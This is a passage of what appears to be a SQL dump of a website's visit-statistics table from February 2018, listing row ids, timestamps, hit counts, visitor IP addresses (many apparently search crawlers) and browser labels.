.149.85','other'),(204994,1517527554,1,1,0,0,'54.36.148.109','other'),(204995,1517527585,2,0,2,0,'66.249.64.67',''),(204996,1517528306,1,1,0,0,'51.255.71.128','other'),(204997,1517528345,1,1,0,0,'40.77.167.66','other'),(204998,1517528459,3,3,0,0,'216.244.66.194','other'),(204999,1517528818,1,1,0,0,'8.29.198.27','other'),(205000,1517529143,1,0,1,0,'66.249.64.67',''),(205001,1517529477,1,1,0,0,'54.36.149.43','other'),(205002,1517530198,1,1,0,0,'54.36.148.112','other'),(205003,1517531201,1,1,0,0,'66.249.64.67','chrome'),(205004,1517531317,1,0,1,0,'66.249.64.15',''),(205005,1517531777,6,6,0,0,'216.244.66.246','other'),(205006,1517532363,3,3,0,0,'216.244.66.194','other'),(205007,1517533068,1,1,0,0,'54.36.148.79','other'),(205008,1517533356,1,1,0,0,'54.36.149.46','other'),(205009,1517534972,1,1,0,0,'66.249.64.71','chrome'),(205010,1517535107,1,1,0,0,'54.36.148.167','other'),(205011,1517535228,1,1,0,0,'5.45.207.49','other'),(205012,1517536299,2,2,0,0,'216.244.66.246','other'),(205013,1517537095,1,1,0,0,'54.36.148.172','other'),(205014,1517537149,1,1,0,0,'54.36.148.70','other'),(205015,1517538091,1,1,0,0,'35.153.67.216','other'),(205016,1517538204,2,2,0,0,'141.8.142.74','other'),(205017,1517538243,4,4,0,0,'216.244.66.194','other'),(205018,1517538592,1,1,0,0,'54.36.148.101','other'),(205019,1517538821,1,1,0,0,'54.36.148.243','other'),(205020,1517538876,1,0,1,0,'66.249.64.14',''),(205021,1517539249,1,1,0,0,'217.69.133.29','other'),(205022,1517539643,1,1,0,0,'8.29.198.27','other'),(205023,1517539958,1,1,0,0,'54.36.149.80','other'),(205024,1517540470,1,1,0,0,'141.8.142.74','other'),(205025,1517540496,1,0,1,0,'66.249.64.73',''),(205026,1517540859,1,1,0,0,'54.36.149.50','other'),(205027,1517541231,2,1,1,0,'66.249.64.73',''),(205028,1517541282,5,5,0,0,'216.244.66.246','other'),(205029,1517542270,1,1,0,0,'54.36.148.178','other'),(205030,1517542442,1,1,0,0,'54.36.149.5','other'),(205031,1517542703,1,1,0,0,'51.255.71.111','other'),(205032,1517542985,1,1,0,0,'51.255.71.113','other'),(205033,1517543023,1,1,0,0,'94.180.197.206','chrome'),(205034,1517543024,1,1,0,0,'90.154.93.189','chrome'),(205035,1517543173,1,1,0,0,'87.250.224.39','other'),(205036,1517543185,1,1,0,0,'51.255.71.133','other'),(205037,1517543198,1,1,0,0,'54.36.148.192','other'),(205038,1517543419,1,1,0,0,'5.45.207.30','other'),(205039,1517543579,1,1,0,0,'54.36.149.43','other'),(205040,1517543588,1,0,1,0,'66.249.64.67',''),(205041,1517543591,1,0,1,0,'66.249.64.14',''),(205042,1517543773,1,1,0,0,'54.36.148.43','other'),(205043,1517544204,1,0,1,0,'66.249.64.73',''),(205044,1517544236,1,1,0,0,'51.255.71.131','other'),(205045,1517544451,1,1,0,0,'52.91.101.144','other'),(205046,1517544470,1,1,0,0,'54.36.148.168','other'),(205047,1517544575,1,1,0,0,'137.74.207.188','other'),(205048,1517544600,1,1,0,0,'54.36.148.253','other'),(205049,1517544728,1,1,0,0,'137.74.201.99','other'),(205050,1517545603,1,1,0,0,'137.74.201.108','other'),(205051,1517545789,2,2,0,0,'216.244.66.246','other'),(205052,1517545874,1,1,0,0,'54.36.149.104','other'),(205053,1517545875,1,1,0,0,'54.36.148.112','other'),(205054,1517546091,1,1,0,0,'54.36.149.93','other'),(205055,1517546384,1,1,0,0,'178.154.171.60','other'),(205056,1517546658,3,3,0,0,'5.189.153.71','other'),(205057,1517547659,1,0,1,0,'66.249.64.67',''),(205058,1517548218,2,2,0,0,'216.244.66.194','other'),(205059,1517548335,1,1,0,0,'91.209.11.236','other'),(205060,1517548364,1,1,0,0,'54.36.149.104','other'),(205061,1517549129,1,1,0,0,'137.74.207.161','other'),(205062,1517549687,1,0,1,0,'66.249.64.73',''),(205063,1517549690,1,1,0,0,'141.8.132.22','other'),(205064,1517549866,1,1,0,0,'157.55.39.104','other'),(205065,1517550009,1,1,0,0,'54.36.149.80','other'),(205066,1517550276,1,1,0,0,'54.36.148.79','other'),(205067,1517550475,1,1,0,0,'8.29.198.26','other'),(205068,1517550917,4,4,0,0,'216.244.66.246','other'),(205069,1517551196,1,1,0,0,'54.36.149.12','other'),(205070,1517551568,1,1,0,0,'87.250.224.125','other'),(205071,1517551956,1,1,0,0,'46.188.59.109','msie'),(205072,1517552191,1,1,0,0,'137.74.207.109','other'),(205073,1517552217,1,1,0,0,'54.36.149.43','other'),(205074,1517552922,5,5,0,0,'216.244.66.194','other'),(205075,1517553354,1,1,0,0,'77.111.244.45','chrome'),(205076,1517554407,1,1,0,0,'54.36.148.192','other'),(205077,1517554537,1,1,0,0,'54.36.148.206','other'),(205078,1517554675,1,1,0,0,'91.196.178.72','chrome'),(205079,1517554930,1,1,0,0,'54.36.149.46','other'),(205080,1517555271,1,1,0,0,'66.249.64.73','chrome'),(205081,1517555398,1,1,0,0,'54.36.149.13','other'),(205082,1517555550,1,1,0,0,'52.91.101.144','other'),(205083,1517555605,5,5,0,0,'216.244.66.246','other'),(205084,1517555607,1,1,0,0,'91.196.178.93','chrome'),(205085,1517555803,1,1,0,0,'54.36.148.101','other'),(205086,1517555841,2,2,0,0,'51.255.71.100','other'),(205087,1517556380,1,1,0,0,'51.255.71.115','other'),(205088,1517556489,1,1,0,0,'52.91.101.144','other'),(205089,1517556512,1,1,0,0,'54.36.149.14','other'),(205090,1517556518,2,2,0,0,'141.8.142.74','other'),(205091,1517557437,1,1,0,0,'52.91.101.144','other'),(205092,1517557971,6,6,0,0,'216.244.66.194','other'),(205093,1517558360,1,1,0,0,'54.36.148.192','other'),(205094,1517558366,1,1,0,0,'52.91.101.144','other'),(205095,1517558504,1,1,0,0,'195.230.119.34','chrome'),(205096,1517558616,1,1,0,0,'54.36.148.250','other'),(205097,1517558670,1,1,0,0,'51.255.71.101','other'),(205098,1517558737,1,1,0,0,'66.249.64.71','chrome'),(205099,1517558749,1,1,0,0,'66.249.64.67','chrome'),(205100,1517559114,1,1,0,0,'46.242.72.2','msie'),(205101,1517559299,1,1,0,0,'52.91.101.144','other'),(205102,1517559506,1,1,0,0,'54.36.148.206','other'),(205103,1517559988,1,1,0,0,'54.36.149.81','other'),(205104,1517560063,1,1,0,0,'54.36.149.50','other'),(205105,1517560100,1,1,0,0,'178.154.171.10','other'),(205106,1517560229,1,1,0,0,'52.91.101.144','other'),(205107,1517560748,2,2,0,0,'54.36.148.59','other'),(205108,1517560961,2,2,0,0,'216.244.66.246','other'),(205109,1517561299,1,1,0,0,'8.29.198.25','other'),(205110,1517561368,1,1,0,0,'130.180.220.144','chrome'),(205111,1517561480,1,1,0,0,'91.196.177.46','other'),(205112,1517561652,1,1,0,0,'91.196.178.93','firefox'),(205113,1517562544,1,1,0,0,'180.76.15.22','other'),(205114,1517562598,1,1,0,0,'31.43.31.25','chrome'),(205115,1517562847,1,1,0,0,'95.135.89.230','firefox'),(205116,1517563107,1,1,0,0,'216.244.66.194','other'),(205117,1517563252,49,49,0,0,'62.210.103.31','other'),(205118,1517563384,1,1,0,0,'178.140.236.40','msie'),(205119,1517563857,1,1,0,0,'91.196.178.76','chrome'),(205120,1517564593,1,1,0,0,'137.74.203.194','other'),(205121,1517565638,1,1,0,0,'91.196.178.76','chrome'),(205122,1517565656,1,1,0,0,'91.196.178.164','chrome'),(205123,1517566211,2,2,0,0,'216.244.66.246','other'),(205124,1517566263,1,0,1,0,'66.249.64.15',''),(205125,1517566546,1,1,0,0,'91.196.178.93','chrome'),(205126,1517567050,1,1,0,0,'178.154.171.10','other'),(205127,1517567647,1,0,1,0,'66.249.64.14',''),(205128,1517567941,1,1,0,0,'91.196.178.164','chrome'),(205129,1517568054,1,1,0,0,'54.36.148.237','other'),(205130,1517568644,1,1,0,0,'37.52.162.17','chrome'),(205131,1517568740,2,2,0,0,'91.196.178.76','chrome'),(205132,1517568845,1,0,1,0,'66.249.64.71',''),(205133,1517569107,1,1,0,0,'37.73.214.226','chrome'),(205134,1517569298,1,1,0,0,'66.249.64.71','chrome'),(205135,1517569382,1,1,0,0,'54.36.148.109','other'),(205136,1517569385,1,1,0,0,'51.255.71.123','other'),(205137,1517569445,1,1,0,0,'91.196.178.131','firefox'),(205138,1517569913,1,1,0,0,'91.196.178.166','chrome'),(205139,1517569939,1,1,0,0,'54.36.149.21','other'),(205140,1517570397,1,0,1,0,'66.249.64.14',''),(205141,1517570661,1,1,0,0,'37.73.232.52','chrome'),(205142,1517570922,1,1,0,0,'180.76.15.34','other'),(205143,1517571279,1,1,0,0,'178.154.171.88','other'),(205144,1517571704,1,1,0,0,'213.5.192.187','chrome'),(205145,1517571906,1,1,0,0,'213.180.203.8','other'),(205146,1517572135,1,1,0,0,'8.29.198.26','other'),(205147,1517572332,1,1,0,0,'91.196.178.131','firefox'),(205148,1517572724,1,1,0,0,'51.255.71.111','other'),(205149,1517573004,1,1,0,0,'137.74.203.194','other'),(205150,1517573009,2,0,2,0,'66.249.64.67',''),(205151,1517573027,2,2,0,0,'91.196.178.132','firefox'),(205152,1517573821,1,1,0,0,'157.55.39.104','other'),(205153,1517574081,2,2,0,0,'91.196.178.93','chrome'),(205154,1517574134,3,3,0,0,'216.244.66.194','other'),(205155,1517574195,3,3,0,0,'144.76.115.190','other'),(205156,1517574384,1,1,0,0,'91.196.178.166','chrome'),(205157,1517574473,1,0,1,0,'66.249.64.71',''),(205158,1517574533,1,1,0,0,'51.255.71.133','other'),(205159,1517574978,1,1,0,0,'51.255.71.125','other'),(205160,1517575222,1,1,0,0,'91.196.178.132','firefox'),(205161,1517576111,2,2,0,0,'216.244.66.246','other'),(205162,1517576521,1,1,0,0,'91.196.178.72','firefox'),(205163,1517576671,1,1,0,0,'46.174.163.134','chrome'),(205164,1517576764,1,0,1,0,'66.249.64.73',''),(205165,1517577108,1,1,0,0,'130.180.209.5','firefox'),(205166,1517577180,1,1,0,0,'164.132.162.158','other'),(205167,1517577445,1,1,0,0,'37.73.216.201','chrome'),(205168,1517577967,1,1,0,0,'91.196.178.71','firefox'),(205169,1517578167,1,1,0,0,'54.36.149.107','other'),(205170,1517578485,1,1,0,0,'95.135.89.230','firefox'),(205171,1517578506,1,1,0,0,'54.36.149.87','other'),(205172,1517578552,1,1,0,0,'77.111.244.48','chrome'),(205173,1517578882,5,5,0,0,'216.244.66.194','other'),(205174,1517579015,1,1,0,0,'92.244.117.173','firefox'),(205175,1517579073,1,1,0,0,'213.180.203.8','other'),(205176,1517579117,1,1,0,0,'157.55.39.59','other'),(205177,1517579306,1,1,0,0,'54.36.149.50','other'),(205178,1517579393,1,1,0,0,'91.196.178.76','chrome'),(205179,1517579535,1,1,0,0,'194.44.142.6','chrome'),(205180,1517580208,1,1,0,0,'54.36.148.239','other'),(205181,1517580649,1,1,0,0,'91.196.177.15','chrome'),(205182,1517581041,1,1,0,0,'91.196.178.131','chrome'),(205183,1517581212,1,1,0,0,'51.255.71.122','other'),(205184,1517581327,5,5,0,0,'216.244.66.246','other'),(205185,1517581375,1,1,0,0,'91.196.178.166','chrome'),(205186,1517581583,1,1,0,0,'212.90.63.137','chrome'),(205187,1517582343,1,1,0,0,'91.213.33.62','chrome'),(205188,1517582355,2,2,0,0,'91.196.178.164','chrome'),(205189,1517582659,1,1,0,0,'91.196.178.82','firefox'),(205190,1517582704,1,1,0,0,'91.196.178.132','firefox'),(205191,1517582969,1,1,0,0,'8.29.198.26','other'),(205192,1517583329,1,1,0,0,'54.36.148.239','other'),(205193,1517583534,1,1,0,0,'137.74.207.108','other'),(205194,1517583815,1,1,0,0,'31.193.91.80','chrome'),(205195,1517583839,1,1,0,0,'164.132.162.164','other'),(205196,1517583917,1,1,0,0,'54.36.148.198','other'),(205197,1517584032,4,4,0,0,'216.244.66.194','other'),(205198,1517584284,1,1,0,0,'151.80.27.118','other'),(205199,1517584601,2,2,0,0,'141.8.142.74','other'),(205200,1517584605,1,1,0,0,'54.36.149.42','other'),(205201,1517584737,1,1,0,0,'54.36.148.251','other'),(205202,1517585265,1,1,0,0,'54.36.149.71','other'),(205203,1517585562,1,1,0,0,'216.244.66.246','other'),(205204,1517586311,1,1,0,0,'54.36.149.90','other'),(205205,1517586331,1,1,0,0,'157.55.39.104','other'),(205206,1517587156,1,0,1,0,'66.249.64.67',''),(205207,1517587393,1,1,0,0,'54.36.148.197','other'),(205208,1517588165,1,1,0,0,'199.58.86.211','other'),(205209,1517588561,1,1,0,0,'54.36.148.139','other'),(205210,1517588878,2,2,0,0,'178.154.171.88','other'),(205211,1517589123,6,6,0,0,'216.244.66.194','other'),(205212,1517589325,1,1,0,0,'51.255.71.118','other'),(205213,1517589653,1,1,0,0,'54.36.148.198','other'),(205214,1517589869,1,1,0,0,'66.249.64.71','chrome'),(205215,1517590180,4,4,0,0,'216.244.66.246','other'),(205216,1517590465,1,1,0,0,'91.196.178.52','chrome'),(205217,1517590592,1,1,0,0,'37.52.16.182','chrome'),(205218,1517591229,1,1,0,0,'54.36.149.8','other'),(205219,1517591983,1,1,0,0,'157.55.39.223','other'),(205220,1517592291,1,1,0,0,'141.8.142.74','other'),(205221,1517592375,1,1,0,0,'54.36.149.59','other'),(205222,1517592469,1,1,0,0,'54.36.149.4','other'),(205223,1517592663,1,1,0,0,'94.179.247.92','chrome'),(205224,1517593537,1,1,0,0,'40.77.167.129','other'),(205225,1517593802,1,1,0,0,'8.29.198.25','other'),(205226,1517593811,1,1,0,0,'51.255.71.131','other'),(205227,1517593841,1,1,0,0,'54.36.149.43','other'),(205228,1517594149,1,1,0,0,'54.36.148.63','other'),(205229,1517594251,1,1,0,0,'54.36.148.139','other'),(205230,1517594339,2,2,0,0,'216.244.66.194','other'),(205231,1517594405,1,1,0,0,'54.36.149.42','other'),(205232,1517594462,1,1,0,0,'151.80.27.118','other'),(205233,1517594923,1,1,0,0,'40.77.167.129','other'),(205234,1517595117,1,1,0,0,'54.36.149.39','other'),(205235,1517595162,1,1,0,0,'54.36.148.205','other'),(205236,1517595397,3,3,0,0,'216.244.66.246','other'),(205237,1517595577,1,1,0,0,'54.165.59.7','other'),(205238,1517595758,1,1,0,0,'94.179.247.92','chrome'),(205239,1517595998,1,1,0,0,'157.55.39.223','other'),(205240,1517596057,6,6,0,0,'37.59.222.30','other'),(205241,1517596104,1,1,0,0,'107.167.109.158','other'),(205242,1517596222,1,1,0,0,'107.167.106.112','other'),(205243,1517596364,1,1,0,0,'54.36.149.44','other'),(205244,1517596652,1,1,0,0,'51.255.71.114','other'),(205245,1517596691,1,1,0,0,'51.255.71.98','other'),(205246,1517596827,1,1,0,0,'94.179.247.92','chrome'),(205247,1517596936,1,1,0,0,'54.36.149.43','other'),(205248,1517597138,1,1,0,0,'37.59.222.30','other'),(205249,1517597193,1,1,0,0,'157.55.39.223','other'),(205250,1517597327,1,1,0,0,'37.73.208.183','chrome'),(205251,1517597432,2,2,0,0,'54.165.59.7','other'),(205252,1517597483,1,1,0,0,'107.167.104.20','other'),(205253,1517597680,1,1,0,0,'91.196.178.9','chrome'),(205254,1517597720,1,1,0,0,'91.196.178.9','other'),(205255,1517597732,1,1,0,0,'54.36.148.170','other'),(205256,1517597770,1,1,0,0,'109.251.210.116','other'),(205257,1517597867,1,1,0,0,'91.196.178.167','chrome'),(205258,1517597902,1,1,0,0,'54.36.149.85','other'),(205259,1517598160,1,1,0,0,'51.255.71.127','other'),(205260,1517598373,1,1,0,0,'54.36.149.87','other'),(205261,1517598770,1,1,0,0,'87.250.224.46','other'),(205262,1517599006,1,1,0,0,'178.95.247.215','chrome'),(205263,1517599109,1,1,0,0,'94.179.247.92','chrome'),(205264,1517599408,4,4,0,0,'216.244.66.194','other'),(205265,1517599881,1,1,0,0,'91.209.11.236','other'),(205266,1517599900,35,35,0,0,'191.96.249.71','other'),(205267,1517600017,1,1,0,0,'94.179.247.92','chrome'),(205268,1517600353,1,1,0,0,'51.255.71.132','other'),(205269,1517600670,2,2,0,0,'216.244.66.246','other'),(205270,1517600919,1,1,0,0,'54.36.149.41','other'),(205271,1517601019,9,9,0,0,'94.179.247.92','chrome'),(205272,1517601149,1,1,0,0,'46.101.182.225','other'),(205273,1517601330,1,1,0,0,'137.74.201.108','other'),(205274,1517602049,1,1,0,0,'54.36.149.25','other'),(205275,1517602102,1,1,0,0,'54.36.148.232','other'),(205276,1517602167,1,1,0,0,'54.36.149.97','other'),(205277,1517602220,1,1,0,0,'51.255.71.118','other'),(205278,1517602501,1,1,0,0,'95.108.181.102','other'),(205279,1517603323,1,1,0,0,'151.80.27.118','other'),(205280,1517603451,1,1,0,0,'54.36.148.196','other'),(205281,1517603484,1,1,0,0,'51.255.71.101','other'),(205282,1517604567,8,8,0,0,'216.244.66.194','other'),(205283,1517604624,1,1,0,0,'8.29.198.25','other'),(205284,1517604943,1,1,0,0,'37.9.113.74','other'),(205285,1517605230,1,1,0,0,'157.55.39.223','other'),(205286,1517605495,4,4,0,0,'216.244.66.246','other'),(205287,1517605693,1,1,0,0,'66.249.64.73','chrome'),(205288,1517605927,1,1,0,0,'87.250.224.77','other'),(205289,1517607739,1,1,0,0,'80.252.155.198','chrome'),(205290,1517607752,1,1,0,0,'5.58.223.118','chrome'),(205291,1517608546,1,1,0,0,'66.249.64.67','chrome'),(205292,1517609432,1,1,0,0,'37.9.113.115','other'),(205293,1517609697,3,3,0,0,'37.59.222.30','other'),(205294,1517609942,5,5,0,0,'216.244.66.194','other'),(205295,1517610777,1,1,0,0,'37.59.222.30','other'),(205296,1517610822,3,3,0,0,'216.244.66.246','other'),(205297,1517610986,1,1,0,0,'54.36.149.91','other'),(205298,1517611058,1,1,0,0,'51.255.71.120','other'),(205299,1517611098,1,1,0,0,'37.9.113.115','other'),(205300,1517612095,1,1,0,0,'51.255.71.98','other'),(205301,1517612228,1,1,0,0,'54.36.148.250','other'),(205302,1517612295,1,1,0,0,'40.77.167.121','other'),(205303,1517613178,1,1,0,0,'213.180.203.8','other'),(205304,1517614075,1,1,0,0,'74.115.214.151','other'),(205305,1517614569,1,0,1,0,'66.249.69.59',''),(205306,1517614716,2,2,0,0,'216.244.66.194','other'),(205307,1517614880,1,1,0,0,'151.80.27.118','other'),(205308,1517615347,1,1,0,0,'51.255.71.114','other'),(205309,1517615371,1,1,0,0,'54.36.148.250','other'),(205310,1517615454,1,1,0,0,'8.29.198.26','other'),(205311,1517615681,2,2,0,0,'216.244.66.246','other'),(205312,1517615998,1,0,1,0,'66.249.69.117',''),(205313,1517616359,1,1,0,0,'51.255.71.110','other'),(205314,1517616459,1,0,1,0,'66.249.69.103',''),(205315,1517616696,1,1,0,0,'54.36.148.206','other'),(205316,1517616801,1,1,0,0,'128.72.76.67','chrome'),(205317,1517616910,1,0,1,0,'66.249.69.59',''),(205318,1517617121,1,1,0,0,'54.36.148.192','other'),(205319,1517617742,1,1,0,0,'51.255.71.115','other'),(205320,1517617787,1,1,0,0,'37.9.113.134','other'),(205321,1517619708,5,5,0,0,'216.244.66.194','other'),(205322,1517619742,1,1,0,0,'51.255.71.130','other'),(205323,1517619801,1,1,0,0,'37.9.113.157','other'),(205324,1517620088,1,1,0,0,'54.36.148.235','other'),(205325,1517620461,1,1,0,0,'54.36.149.8','other'),(205326,1517620635,1,1,0,0,'51.255.71.116','other'),(205327,1517620942,1,0,1,0,'66.249.69.105',''),(205328,1517621089,1,1,0,0,'66.249.69.59','chrome'),(205329,1517621174,3,3,0,0,'216.244.66.246','other'),(205330,1517621402,1,1,0,0,'37.9.113.134','other'),(205331,1517621873,1,1,0,0,'37.9.113.100','other'),(205332,1517622160,1,1,0,0,'54.36.148.235','other'),(205333,1517623045,1,1,0,0,'216.244.66.237','other'),(205334,1517623117,1,1,0,0,'213.180.203.8','other'),(205335,1517623125,1,1,0,0,'66.249.69.105','chrome'),(205336,1517623732,1,1,0,0,'54.36.149.12','other'),(205337,1517624354,1,1,0,0,'87.250.224.85','other'),(205338,1517624468,1,1,0,0,'54.36.149.21','other'),(205339,1517624806,4,4,0,0,'216.244.66.194','other'),(205340,1517625179,1,1,0,0,'157.55.39.223','other'),(205341,1517625299,1,1,0,0,'51.255.71.130','other'),(205342,1517625462,1,1,0,0,'157.55.39.104','other'),(205343,1517626016,6,6,0,0,'216.244.66.246','other'),(205344,1517626294,1,1,0,0,'8.29.198.27','other'),(205345,1517626708,1,1,0,0,'137.74.207.108','other'),(205346,1517627542,1,0,1,0,'66.249.69.41',''),(205347,1517627824,1,1,0,0,'54.36.148.70','other'),(205348,1517628389,1,1,0,0,'54.36.148.101','other'),(205349,1517628618,2,2,0,0,'91.196.178.57','chrome'),(205350,1517628620,1,1,0,0,'31.13.114.83','other'),(205351,1517628858,1,1,0,0,'37.9.113.74','other'),(205352,1517628978,1,0,1,0,'66.249.69.53',''),(205353,1517629115,1,1,0,0,'37.9.113.56','other'),(205354,1517629581,1,1,0,0,'178.154.171.88','other'),(205355,1517629608,1,1,0,0,'141.8.142.96','other'),(205356,1517629612,1,1,0,0,'37.9.113.100','other'),(205357,1517629930,3,3,0,0,'216.244.66.194','other'),(205358,1517629964,1,1,0,0,'54.36.149.76','other'),(205359,1517630113,1,1,0,0,'54.36.148.241','other'),(205360,1517630124,1,1,0,0,'54.36.148.239','other'),(205361,1517630343,1,1,0,0,'46.188.61.109','chrome'),(205362,1517631355,5,5,0,0,'216.244.66.246','other'),(205363,1517631409,1,1,0,0,'54.36.148.202','other'),(205364,1517631460,1,0,1,0,'66.249.69.41',''),(205365,1517631481,1,1,0,0,'54.36.149.71','other'),(205366,1517632098,1,0,1,0,'66.249.69.89',''),(205367,1517632182,1,1,0,0,'2.92.32.178','msie'),(205368,1517632436,1,1,0,0,'54.36.149.20','other'),(205369,1517632532,1,1,0,0,'157.55.39.104','other'),(205370,1517632538,1,1,0,0,'54.36.149.65','other'),(205371,1517632945,1,1,0,0,'164.132.162.159','other'),(205372,1517633179,1,0,1,0,'66.249.69.39',''),(205373,1517633318,1,1,0,0,'54.36.148.243','other'),(205374,1517633534,1,1,0,0,'107.167.107.26','other'),(205375,1517633546,1,1,0,0,'37.9.113.63','other'),(205376,1517633831,1,1,0,0,'54.36.148.172','other'),(205377,1517634347,1,1,0,0,'54.36.149.97','other'),(205378,1517634635,1,1,0,0,'216.244.66.194','other'),(205379,1517635182,1,0,1,0,'66.249.69.39',''),(205380,1517635333,1,1,0,0,'37.9.113.80','other'),(205381,1517635493,4,4,0,0,'216.244.66.246','other'),(205382,1517636507,1,1,0,0,'178.154.200.7','other'),(205383,1517636746,1,0,1,0,'66.249.69.89',''),(205384,1517637124,1,1,0,0,'8.29.198.25','other'),(205385,1517637852,1,1,0,0,'137.74.201.100','other'),(205386,1517637979,1,1,0,0,'5.45.207.82','other'),(205387,1517638184,1,1,0,0,'37.9.113.115','other'),(205388,1517638730,1,1,0,0,'213.180.203.8','other'),(205389,1517638817,1,1,0,0,'216.244.66.237','other'),(205390,1517639451,1,1,0,0,'54.36.149.26','other'),(205391,1517639772,1,1,0,0,'54.36.149.56','other'),(205392,1517639842,1,1,0,0,'188.165.4.128','chrome'),(205393,1517640147,3,3,0,0,'216.244.66.194','other'),(205394,1517640488,1,1,0,0,'54.36.148.79','other'),(205395,1517640609,2,2,0,0,'87.250.224.125','other'),(205396,1517640613,1,1,0,0,'141.8.142.126','other'),(205397,1517640675,1,0,1,0,'66.249.69.41',''),(205398,1517640937,1,1,0,0,'137.74.201.108','other'),(205399,1517641190,3,3,0,0,'216.244.66.246','other'),(205400,1517641266,1,1,0,0,'54.36.149.87','other'),(205401,1517641531,1,1,0,0,'54.36.149.39','other'),(205402,1517642010,1,1,0,0,'51.255.71.133','other'),(205403,1517642250,1,1,0,0,'217.69.133.217','other'),(205404,1517642387,1,1,0,0,'217.69.133.242','other'),(205405,1517642774,1,1,0,0,'157.55.39.221','other'),(205406,1517643119,1,1,0,0,'5.45.207.49','other'),(205407,1517643651,1,1,0,0,'178.154.171.55','other'),(205408,1517643749,1,1,0,0,'188.165.4.128','firefox'),(205409,1517643941,1,1,0,0,'216.244.66.237','other'),(205410,1517644030,1,1,0,0,'54.36.149.87','other'),(205411,1517644201,1,1,0,0,'164.132.162.164','other'),(205412,1517644219,4,4,0,0,'216.244.66.194','other'),(205413,1517644240,1,0,1,0,'66.249.69.35',''),(205414,1517644644,1,1,0,0,'69.30.213.202','other'),(205415,1517645000,4,4,0,0,'216.244.66.246','other'),(205416,1517645178,1,1,0,0,'216.244.66.237','other'),(205417,1517645274,1,1,0,0,'54.36.148.79','other'),(205418,1517645415,2,2,0,0,'37.53.230.248','chrome'),(205419,1517645828,1,0,1,0,'66.249.69.39',''),(205420,1517645849,1,1,0,0,'137.74.207.161','other'),(205421,1517645947,1,1,0,0,'213.180.203.7','other'),(205422,1517646130,1,1,0,0,'91.196.178.99','chrome'),(205423,1517646909,1,1,0,0,'54.36.149.8','other'),(205424,1517646957,1,1,0,0,'178.154.171.88','other'),(205425,1517647785,1,1,0,0,'5.45.207.49','other'),(205426,1517647791,2,2,0,0,'37.55.57.119','chrome'),(205427,1517647874,1,1,0,0,'54.36.149.87','other'),(205428,1517647948,1,1,0,0,'8.29.198.25','other'),(205429,1517648093,1,1,0,0,'178.154.200.32','other'),(205430,1517648357,1,1,0,0,'87.250.224.46','other'),(205431,1517648526,1,1,0,0,'54.36.148.102','other'),(205432,1517648920,2,2,0,0,'37.53.230.248','chrome'),(205433,1517649592,1,1,0,0,'157.55.39.221','other'),(205434,1517649810,1,1,0,0,'51.255.71.127','other'),(205435,1517650083,4,4,0,0,'216.244.66.246','other'),(205436,1517650135,2,2,0,0,'91.196.178.14','chrome'),(205437,1517650526,1,0,1,0,'66.249.69.39',''),(205438,1517650592,7,7,0,0,'216.244.66.194','other'),(205439,1517651209,1,1,0,0,'37.9.113.134','other'),(205440,1517651829,1,1,0,0,'54.36.148.241','other'),(205441,1517652174,2,2,0,0,'78.111.190.131','chrome'),(205442,1517652778,1,1,0,0,'46.211.252.154','chrome'),(205443,1517652900,1,1,0,0,'51.255.71.112','other'),(205444,1517653440,1,1,0,0,'137.74.207.102','other'),(205445,1517653866,1,1,0,0,'95.221.51.221','msie'),(205446,1517654065,1,1,0,0,'141.8.142.29','other'),(205447,1517654135,2,2,0,0,'216.244.66.194','other'),(205448,1517654177,1,1,0,0,'95.47.150.229','firefox'),(205449,1517654410,1,1,0,0,'51.255.71.125','other'),(205450,1517654937,1,1,0,0,'217.69.133.215','other'),(205451,1517654983,1,1,0,0,'164.132.164.180','other'),(205452,1517655199,1,1,0,0,'54.36.149.35','other'),(205453,1517655252,2,2,0,0,'157.55.39.59','other'),(205454,1517655388,1,1,0,0,'54.36.149.65','other'),(205455,1517655473,2,2,0,0,'216.244.66.246','other'),(205456,1517655627,1,1,0,0,'54.36.149.104','other'),(205457,1517656097,1,1,0,0,'95.108.213.24','other'),(205458,1517656376,1,1,0,0,'157.55.39.220','other'),(205459,1517656529,1,1,0,0,'51.255.71.101','other'),(205460,1517656536,2,2,0,0,'37.53.230.248','chrome'),(205461,1517656876,1,1,0,0,'54.36.149.90','other'),(205462,1517657004,1,1,0,0,'137.74.207.102','other'),(205463,1517658544,1,1,0,0,'51.255.71.101','other'),(205464,1517658708,5,5,0,0,'37.53.230.248','chrome'),(205465,1517658771,1,1,0,0,'8.29.198.27','other'),(205466,1517659495,1,1,0,0,'216.244.66.246','other'),(205467,1517659896,1,1,0,0,'54.36.149.8','other'),(205468,1517660014,4,4,0,0,'216.244.66.194','other'),(205469,1517660146,1,1,0,0,'137.74.207.108','other'),(205470,1517661069,1,0,1,0,'66.249.64.67',''),(205471,1517661547,1,1,0,0,'188.230.43.254','other'),(205472,1517661675,1,1,0,0,'157.55.39.104','other'),(205473,1517661801,1,1,0,0,'54.36.149.90','other'),(205474,1517661878,1,0,1,0,'66.249.64.73',''),(205475,1517661982,1,1,0,0,'180.76.15.5','other'),(205476,1517662155,1,1,0,0,'178.154.171.56','other'),(205477,1517662491,1,1,0,0,'89.137.6.197','firefox'),(205478,1517662495,1,1,0,0,'54.36.148.206','other'),(205479,1517662849,1,1,0,0,'216.244.66.237','other'),(205480,1517662942,1,0,1,0,'66.249.64.71',''),(205481,1517663109,3,3,0,0,'176.31.30.184','other'),(205482,1517663271,1,1,0,0,'95.47.150.229','firefox'),(205483,1517663907,1,1,0,0,'188.230.43.254','other'),(205484,1517664162,1,1,0,0,'51.255.71.128','other'),(205485,1517664203,1,1,0,0,'54.36.148.178','other'),(205486,1517664700,3,3,0,0,'216.244.66.246','other'),(205487,1517665080,6,6,0,0,'216.244.66.194','other'),(205488,1517665195,1,1,0,0,'37.9.113.134','other'),(205489,1517665890,1,1,0,0,'91.209.11.236','other'),(205490,1517666309,1,1,0,0,'188.230.43.254','other'),(205491,1517666880,1,0,1,0,'66.249.64.71',''),(205492,1517666940,2,2,0,0,'91.196.178.163','chrome'),(205493,1517667776,1,1,0,0,'54.36.149.78','other'),(205494,1517667855,1,0,1,0,'66.249.64.71',''),(205495,1517667952,1,1,0,0,'95.220.199.179','msie'),(205496,1517668105,1,1,0,0,'37.9.113.74','other'),(205497,1517668708,1,1,0,0,'188.230.43.254','other'),(205498,1517668869,1,1,0,0,'54.36.148.196','other'),(205499,1517669016,3,3,0,0,'216.244.66.246','other'),(205500,1517669024,1,1,0,0,'54.36.149.84','other'),(205501,1517669116,2,2,0,0,'37.53.230.248','chrome'),(205502,1517669606,1,1,0,0,'8.29.198.27','other'),(205503,1517669900,3,3,0,0,'216.244.66.194','other'),(205504,1517671537,1,1,0,0,'51.255.71.112','other'),(205505,1517671543,1,1,0,0,'37.9.113.74','o